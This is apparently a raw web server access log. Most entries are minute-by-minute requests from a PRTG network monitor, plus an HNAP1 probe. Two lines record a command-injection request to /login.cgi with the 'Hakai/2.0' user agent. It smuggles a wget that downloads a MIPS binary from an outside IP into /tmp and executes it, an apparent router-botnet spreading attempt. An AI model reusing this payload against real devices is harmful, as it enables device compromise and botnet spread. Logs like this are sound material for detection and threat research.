212.91.246.72 - - [05/Dec/2022:07:40:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:41:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.255.233.41 - - [05/Dec/2022:07:42:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [05/Dec/2022:07:42:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:43:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:44:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:45:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:46:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:47:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:48:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:49:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.91.47.43 - - [05/Dec/2022:07:50:35 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [05/Dec/2022:07:50:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:51:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:52:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:53:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:54:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:55:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
202.164.136.69 - - [05/Dec/2022:07:55:43 +0100] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
212.91.246.72 - - [05/Dec/2022:07:56:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.91.47.43 - - [05/Dec/2022:07:56:54 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [05/Dec/2022:07:57:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:58:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:07:59:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Dec/2022:08:00:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
